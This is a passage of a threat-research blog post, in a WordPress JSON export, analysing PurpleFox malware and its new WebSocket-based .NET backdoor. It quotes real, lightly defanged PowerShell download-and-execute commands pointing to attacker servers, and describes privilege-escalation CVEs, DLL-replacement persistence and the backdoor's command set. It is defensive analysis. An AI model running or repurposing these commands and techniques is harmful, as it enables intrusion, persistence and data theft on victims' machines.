{"id":44110,"date":"2021-10-19T00:00:00","date_gmt":"2021-10-19T00:00:00","guid":{"rendered":"urn:uuid:a842acb8-6bd7-989a-6b57-3b7aad2a273a"},"modified":"2021-10-19T00:00:00","modified_gmt":"2021-10-19T00:00:00","slug":"purplefox-adds-new-backdoor-that-uses-websockets","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/","title":{"rendered":"PurpleFox Adds New Backdoor That Uses WebSockets"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox-main.jpg\"><\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"1154148854\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"10.79375\">\n<div class=\"article-details\" role=\"heading\" readability=\"41.2125\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Cyber Threats<\/p>\n<p class=\"article-details__description\">In September 2021, the 
Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.<\/p>\n<p class=\"article-details__author-by\">By: Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy <time class=\"article-details__date\">October 19, 2021<\/time> <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-md-8 col-md-push-2\"> <\/p>\n<div class=\"richText\" readability=\"47.213541666667\">\n<div readability=\"39.758771929825\">\n<p>In September 2021, the Trend Micro <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response\/managed-xdr-mdr.html\">Managed XDR<\/a> (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.<\/p>\n<p>We also found a new backdoor written in .NET implanted during the intrusion, which we believe is highly associated with PurpleFox. This backdoor, which we call FoxSocket, leverages WebSockets to communicate with its command-and-control (C&amp;C) servers, resulting in a more robust and secure means of communication compared to regular HTTP traffic.<\/p>\n<p>We believe that this particular threat is currently being aimed at users in the Middle East. We first encountered this threat via customers in the region. 
We are currently investigating if it has been found in other parts of the world.<\/p>\n<p>In this blog, we describe some of the observed modifications for the initial PurpleFox payloads, alongside the new implanted .NET backdoor and the C2 infrastructure serving its functionality.<\/p>\n<p><span class=\"body-subhead-title\"><b>PurpleFox Capabilities and Technical Analysis<\/b><\/span><\/p>\n<p><b><i>PowerShell<\/i><\/b><\/p>\n<p>The activity starts with either of the following PowerShell commands being executed:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">&#8220;cmd.exe&#8221; \/c powershell -nop -exec bypass -c &#8220;IEX (New-Object Net.WebClient).DownloadString(&#8216;hxxp[[:]]\/\/103.228.112.246[[:]]17881\/57BC9B7E.Png&#8217;);MsiMake hxxp[[:]]\/\/103.228.112.246[[:]]17881\/0CFA042F.Png&#8221;<\/span><\/li>\n<li><span class=\"rte-red-bullet\">&#8220;cmd.exe&#8221; \/c powershell -nop -exec bypass -c &#8220;IEX (New-Object Net.WebClient).DownloadString(&#8216;http[:]\/\/117.187.136.141[:]13405\/57BC9B7E.Png&#8217;);MsiMake http[:]\/\/117.187.136.141[:]13405\/0CFA042F.Png&#8221;<\/span><\/li>\n<\/ul>\n<p>These commands download a malicious payload from the specified URLs, which are hosted on multiple compromised servers. These servers are part of the PurpleFox botnet, with most of these located in China:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\" width=\"100%\">\n<caption>Table 1. 
Location of PurpleFox servers<\/caption>\n<tbody>\n<tr>\n<td><b>Country<\/b><\/td>\n<td><b>Server count<\/b><\/td>\n<\/tr>\n<tr>\n<td>China<\/td>\n<td>345<\/td>\n<\/tr>\n<tr>\n<td>India<\/td>\n<td>34<\/td>\n<\/tr>\n<tr>\n<td>Brazil<\/td>\n<td>29<\/td>\n<\/tr>\n<tr>\n<td>United States<\/td>\n<td>26<\/td>\n<\/tr>\n<tr>\n<td>Others<\/td>\n<td>113<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34.727032734952\">\n<div readability=\"17.125659978881\">\n<p>The fetched payload is a long script consisting of three components:<\/p>\n<ol>\n<li><a href=\"https:\/\/github.com\/Kevin-Robertson\/Tater\/blob\/master\/Tater.ps1\" target=\"_blank\" rel=\"noopener\">Tater<\/a> (Hot Potato \u2013 privilege escalation)<\/li>\n<li><a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\/blob\/master\/CodeExecution\/Invoke-ReflectivePEInjection.ps1\" target=\"_blank\" rel=\"noopener\">PowerSploit<\/a><\/li>\n<li><a href=\"https:\/\/www.virustotal.com\/gui\/file\/5d7c25df48dac73698ae455a3d98ea38c2502edf862a47dc6db9a177147db453\" target=\"_blank\" rel=\"noopener\">Embedded exploit bundle binary<\/a> (privilege escalation)<\/li>\n<\/ol>\n<p>The script targets 64-bit architecture systems. 
It starts by checking the Windows version and applied hotfixes for the vulnerabilities it is targeting.<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Windows 7\/Windows Server 2008<\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">CVE-2020-1054 (KB4556836, KB4556843)<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">CVE-2019-0808 (KB4489878, KB4489885, KB2882822)<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span class=\"rte-red-bullet\">Windows 8\/Windows Server 2012<\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">CVE-2019-1458 (KB4530702, KB4530730)<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span class=\"rte-red-bullet\">Windows 10\/Windows Server 2019<\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">CVE-2021-1732 (KB4601354, KB4601345, KB4601315, KB4601319)<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>After selecting the appropriate vulnerability, it uses the PowerSploit module to reflectively load the embedded exploit bundle binary with the target vulnerability and an MSI command as arguments. As a failover, it uses the Tater module to launch the MSI command.<\/p>\n<p>The goal is to install the MSI package as an admin without any user interaction.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"50\">\n<div readability=\"45\">\n<p><b><i>MSI Package<\/i><\/b><\/p>\n<p>The MSI package starts by removing the following registry keys, which are old Purple Fox installations if any are present:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">HKLM\\SYSTEM\\CurrentControlSet\\Services\\{ac00-ac10}<\/span><\/li>\n<\/ul>\n<p>It then installs the components (<i>dbcode21mk.log<\/i> and <i>setupact64.log<\/i>) of the Purple Fox backdoor to Windows directory. 
Afterward, it sets two registry values under the key \u201cHKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\u201d:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">AllowProtectedRenames to 0x1, and<\/span><\/li>\n<li><span class=\"rte-red-bullet\">PendingFileRenameOperations to the following:<\/span><\/li>\n<\/ul>\n<p><span class=\"blockquote\">\\??\\C:\\Windows\\AppPatch\\Acpsens.dll<\/span><\/p>\n<p>\\??\\C:\\Windows\\system32\\sens.dll<br \/>\\??\\C:\\Windows\\AppPatch\\Acpsens.dll<br \/>\\??\\C:\\Windows\\system32\\sens.dll<\/p>\n<p>\\??\\C:\\Windows\\setupact64.log<br \/>\\??\\C:\\Windows\\system32\\sens.dll<\/p>\n<p>These commands move <i>sens.dll<\/i> to <i>C:\\Windows\\AppPatch\\Acpsens.dll<\/i> and replace it with the installed file <i>setupact64.log<\/i>.<\/p>\n<p>The MSI package then runs a .vbs script that creates a Windows firewall rule to block incoming connections on ports 135, 139, and 445. As a final step, the system is restarted to allow PendingFileRenameOperations to take place, replacing <i>sens.dll<\/i>, which will make the malware run as the System Event Notification Service (SENS).<\/p>\n<p><b><i>PurpleFox Backdoor<\/i><\/b><\/p>\n<p>The installed malware is a .dll file protected with VMProtect. Using the other data file installed by the MSI package, it unpacks and manually loads different DLLs for its functionality. It also has a rootkit driver that is also unpacked from the data file and is used to hide its files, registry keys, and processes. The sample starts by copying itself to another file and installing a new service, then restoring the original sens.dll file. 
Afterward, it loads the driver to hide its files and registry keys, then spawns a sequence of 32-bit processes and injects its code modules into them, as those modules are 32-bit DLLs.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox01.png\" alt=\"PurpleFox installation process\"><figcaption>Figure 1. PurpleFox installation process<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p><span class=\"body-subhead-title\">WebSocket Backdoor<\/span><\/p>\n<p><b><i>Initial Delivery<\/i><\/b><\/p>\n<p>The initial activity for retrieving this backdoor was captured three days after the previous PurpleFox intrusion attempts on the same compromised server. The Trend Micro Vision One\u2122 platform flagged the following suspicious PowerShell commands:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">&#8220;cmd.exe&#8221; \/c powershell -c &#8220;iex((new-object Net.WebClient).DownloadString(&#8216;hxxp[:]\/\/185.112.144.245\/a\/1&#8217;))&#8221;<\/span><\/li>\n<li><span class=\"rte-red-bullet\">&#8220;cmd.exe&#8221; \/c powershell -c &#8220;iex((new-object Net.WebClient).DownloadString(&#8216;hxxp[:]\/\/185.112.144.245\/a\/2&#8217;))&#8221;<\/span><\/li>\n<li><span class=\"rte-red-bullet\">&#8220;cmd.exe&#8221; \/c powershell -c &#8220;iex((new-object Net.WebClient).DownloadString(&#8216;hxxp[:]\/\/185.112.144.245\/a\/3&#8217;))&#8221;<\/span><\/li>\n<li><span class=\"rte-red-bullet\">&#8220;cmd.exe&#8221; \/c powershell -c &#8220;iex((new-object Net.WebClient).DownloadString(&#8216;hxxp[:]\/\/185.112.144.245\/a\/4&#8217;))&#8221;<\/span><\/li>\n<li><span class=\"rte-red-bullet\">&#8220;cmd.exe&#8221; \/c powershell -c &#8220;iex((new-object 
Net.WebClient).DownloadString(&#8216;hxxp[:]\/\/185.112.144.245\/a\/5&#8217;))&#8221;<\/span><\/li>\n<li><span class=\"rte-red-bullet\">&#8220;cmd.exe&#8221; \/c powershell -c &#8220;iex((new-object Net.WebClient).DownloadString(&#8216;hxxp[:]\/\/185.112.144.245\/a\/8&#8217;))&#8221;<\/span><\/li>\n<li><span class=\"rte-red-bullet\">&#8220;cmd.exe&#8221; \/c powershell -c &#8220;iex((new-object Net.WebClient).DownloadString(&#8216;hxxp[:]\/\/185.112.144.245\/a\/9&#8217;))&#8221;<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox02.png\" alt=\"Trend Micro Vision One alert for PowerShell commands\"><figcaption>Figure 2. Trend Micro Vision One alert for PowerShell commands<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>We analyzed the payload hosted on the URLs, which were variations of 185[.]112.144.245\/a\/[1-9], and all were found to be serving two variants of another PowerShell script that acts as the main downloader for the .NET backdoor.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox03.png\" alt=\"Contents of payload\"><figcaption>Figure 3. Contents of payload<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>The difference between the two observed PowerShell scripts was in the Base64-encoded data that was passed as an argument to the .NET sample downloaded from <i>185[.]112[.]144[.]45\/a\/data<\/i> and finally invoked with this configuration parameter. 
We found two different configuration parameters used: We observed the first one on August 26 and the second one with more domains embedded on August 30. The decoded Base64-encoded configuration parameters are shown in the following figures:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox04.png\" alt=\"August 26 configuration\"><figcaption>Figure 4. August 26 configuration<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox05.png\" alt=\"August 30 configuration\"><figcaption>Figure 5. August 30 configuration<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36\">\n<div readability=\"17\">\n<p>These configuration parameters will be used by the .NET initialization routines to pick a C&amp;C server and initialize cryptographic functions for the C&amp;C channel. 
Aside from the configuration, the payload itself is retrieved from <i>185.112.144[.]45\/a\/data<\/i>. We also found some old variants that date back to June 22 that have fewer capabilities than the more recent variants.<\/p>\n<p>During the earliest iterations for deploying this backdoor, aligning with the creation date of the malicious domain <i>advb9fyxlf2v[.]com<\/i>, the configuration parameters had a minimal number of subdomains to contact the C&amp;C servers compared to the recent one.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox06.png\" alt=\"Backdoor configuration\"><figcaption>Figure 6. Backdoor configuration<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35\">\n<div readability=\"15\">\n<p><span class=\"body-subhead-title\">.NET Backdoor Obfuscation<\/span><\/p>\n<p>Let us start the analysis with the backdoor dropped on the SQL server. When decompiled, it outputs obfuscated symbols, most of which cannot be restored to their original names. Merely making them human-readable is sufficient for basic static analysis. Sometimes, some of the original names can be restored.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox07.png\" alt=\"Cleaned classes and method names\"><figcaption>Figure 7. 
Cleaned classes and method names<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p>One notable characteristic we rarely see in malware is leveraging WebSocket communication to the C&amp;C servers for an efficient bidirectional channel between the infected client and the server.<\/p>\n<p>WebSocket is a communication technology that supports streams of data to be exchanged between a client and a server over just a single TCP session. This is different from traditional request or response protocols like HTTP. This gives the threat actor a more covert alternative to HTTP requests and responses traffic, which creates an opportunity for a more silent exfiltration with less likelihood of being detected.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox08.png\" alt=\"Traditional (left) and WebSocket techniques (right)\"><figcaption>Figure 8. Traditional (left) and WebSocket techniques (right)<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>It initializes a WebSocket communication with its C&amp;C server and keeps it open by sending keepalive messages to maintain the TCP connection. Once this is established, a series of bidirectional messages will be exchanged between the infected machine and the selected C&amp;C server to negotiate a session encryption key.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox09.png\" alt=\"TCP\/IP exchanges between client and server\"><figcaption>Figure 9. 
TCP\/IP exchanges between client and server<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p>The execution starts by initializing the WebSocket and registering four callback functions as handlers for the WebSocket events.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox10.png\" alt=\"Function for registering callback functions\"><figcaption>Figure 10. Function for registering callback functions<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36\">\n<div readability=\"17\">\n<p>One of the relevant callbacks is <b>onOpen<\/b>, which will initialize the C&amp;C channel encryption parameters once the WebSocket object is fired for the first time. As shown in the next section, this is mainly for implementing the first Diffie-Hellman (DH) key exchange message with the C&amp;C server. On the other side, the <b>onReceive<\/b> handler will process and dispatch all the commands received from the server after a secure communication channel is established and when the session encryption key is updated.<\/p>\n<p><span class=\"body-subhead-title\">Key Negotiations<\/span><\/p>\n<p>The first key exchange with the C&amp;C server is carried out by the <b>onOpen<\/b> callback registered function, as seen in Figure 11.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox11.png\" alt=\"onOpen function\"><figcaption>Figure 11. 
onOpen function<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"39\">\n<div readability=\"23\">\n<p>It initializes the EC DH object with some parameters to start the shared secret key negotiation. The <b>ECDiffieHellmanKeyDerivationFunction<\/b> property is then set to <b>Hash<\/b>. This property specifies the key derivation function that the <b>ECDiffieHellmanCng<\/b> class will use to convert secret agreements into key material, so a <b>hash algorithm<\/b> is used to generate key material (instead of <b>HMAC<\/b> or <b>TLS<\/b>).<\/p>\n<p>Afterward, the client will try to send the property <b>PublicKey<\/b>, which will be used at the C&amp;C side on another <b>ECDiffieHellmanCng<\/b> object to generate a shared secret agreement. Eventually, this data will be sent on the WebSocket as the first key exchange message. However, instead of sending it in cleartext, the client applies symmetric AES encryption to all communication over the WebSocket, including this first exchange; since no shared secret has been established yet, the AES routine generates a default key for this first exchange.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox12.png\" alt=\"Function and code for the AES encryption key\"> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox13.png\" alt=\"Function and code for the AES encryption key\"><figcaption>Figures 12-13. 
Function and code for the AES encryption key<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>This will result in the key negotiation message being encrypted with <b>AES<\/b> using the shown parameters and a dummy key generated <b>(111\u2026.11)[32]<\/b> named <b>byte_0<\/b> in the following debugging session with the actual AES cipher text with a fixed length of <b>176 bytes<\/b>.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox14.png\" alt=\"Structure of key exchange message\"><figcaption>Figure 14. Structure of key exchange message<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p>The 176 encrypted bytes are the actual data that will be sent over the WebSocket, which marks the end of the first key exchange message.<\/p>\n<p><span class=\"body-subhead-title\">Second Exchange (C&amp;C to Victim)<\/span><\/p>\n<p>The second key exchange message is sent from the server to the client that will be handled by the <b>onReceive<\/b> function. The execution is invoked by the message handler.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox15.png\" alt=\"Invoking the onReceive function\"><figcaption>Figure 15. 
Invoking the onReceive function<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p>This AES-encrypted second exchange has a fixed length of 304 bytes.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox16.png\" alt=\"Contents of incoming message\"><figcaption>Figure 16. Contents of incoming message<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>It then checks if this incoming message is related to the control plane key establishment or just a normal data command.<\/p>\n<p>If it is related to the former, the first step is to decrypt the symmetric encryption on the C2 channel then finalize the shared secret generation by handing the execution to ECDH derivation function method_7.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox17.png\" alt=\"Handoff to method_7 function\"><figcaption>Figure 17. Handoff to method_7 function<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>The client will verify the signed message by loading the RSA public key loaded from the configuration payload shown in the previous section. 
If the signature is verified correctly, key material will be derived from the DH exchange and will be saved as the permanent symmetric AES encryption key (Symmetric_AES_key variable) that will be used as long as the WebSocket channel is active.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox18.png\" alt=\"method_7 function\"><figcaption>Figure 18. method_7 function<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"40\">\n<div readability=\"25\">\n<p><span class=\"body-subhead-title\">Third Exchange (Victim to C&amp;C)<\/span><\/p>\n<p>Once an efficient encrypted session is established over the WebSocket, the client will fingerprint the machine by extracting specific data (including the username, machine name, local IP, MAC address, and Windows version) and will relay such data over the secure channel to get the victim profiled at the server side, which is the final exchange before the WebSocket channel is fully established. It will then listen for further commands, which will be covered in the next section.<\/p>\n<p>As the fingerprinting data collected will be different from one execution environment to another, this message will vary in length. From our lab analysis, it was 240 bytes with the newly generated shared secret key.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox19.png\" alt=\"Newly generated secret key\"><figcaption>Figure 19. 
Newly generated secret key<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"37.5\">\n<div readability=\"20\">\n<p>As long as the WebSocket is kept alive with the keepalive messages shown earlier, the operators can send any command to be executed, so what happens next depends mainly on the targeting and the actual motivation of the operator.<\/p>\n<p><span class=\"body-subhead-title\">WebSocket Commands<\/span><\/p>\n<p>In this section, we cover some of the observed commands sent from the server. There are minor differences between variants with regard to the command numbers and the supported functionality.<\/p>\n<p>All the handling of commands is implemented in the main dispatch routine (except for command 160, which is used for key negotiation or renegotiation).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\" width=\"100%\">\n<caption>Table 2. 
List of commands<\/caption>\n<tbody readability=\"22\">\n<tr>\n<td><b>Command code<\/b><\/td>\n<td><b>Functionality<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>20<\/td>\n<td>Sends the current date on the victim machine<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>30<\/td>\n<td>Leaks DriveInfo.GetDrives() results info for all the drives&nbsp;<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>40<\/td>\n<td>Leaks DirectoryInfo() results info for a specific directory<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>50<\/td>\n<td>FileInfo()results info for a specific file<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>60<\/td>\n<td>Recursive directory search<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>70<\/td>\n<td>Executes WMI queries &#8211; ManagementObjectSearcher()<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>80<\/td>\n<td>Closes the WebSocket Session<\/td>\n<\/tr>\n<tr>\n<td>90<\/td>\n<td>Exits the process<\/td>\n<\/tr>\n<tr>\n<td>100<\/td>\n<td>Spawns a new process<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>110<\/td>\n<td>Downloads more data from a specific URL to the victim machine<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>120<\/td>\n<td>DNS lookup from the victim machine<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>130<\/td>\n<td>Leaks specific file contents from the victim machine<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>140<\/td>\n<td>Writes new content to a specific location<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>150<\/td>\n<td>Downloads data then write to a specific file<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>160<\/td>\n<td>Renegotiates session key for symmetric encryption<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>180<\/td>\n<td>Gets current process ID\/Name<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>210<\/td>\n<td>Returns the configuration parameter for the backdoor<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>220<\/td>\n<td>Kills the process then start the new process with a different config<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>230<\/td>\n<td>Kills specific 
process by PID<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>240<\/td>\n<td>Queries internal backdoor object properties<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>260<\/td>\n<td>Leaks the hashes of specific requested files<\/td>\n<\/tr>\n<tr>\n<td>270<\/td>\n<td>Kills a list of PIDs<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>280<\/td>\n<td>Deletes a requested list of files\/directories<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>290<\/td>\n<td>Moves a list of files\/directories to another location<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>300<\/td>\n<td>Creates a new directory at a specific location<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p><span class=\"body-subhead-title\">WebSocket C&amp;C Infrastructure<\/span><\/p>\n<p>At the time of writing, several active C&amp;C servers were controlling the WebSocket clients. By profiling the infected targets and observing the commands exchanged, we compiled the IP addresses and registered domains found in the PowerShell downloaders and in the backdoor\u2019s configuration parameters.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\" width=\"100%\">\n<caption>Table 3. 
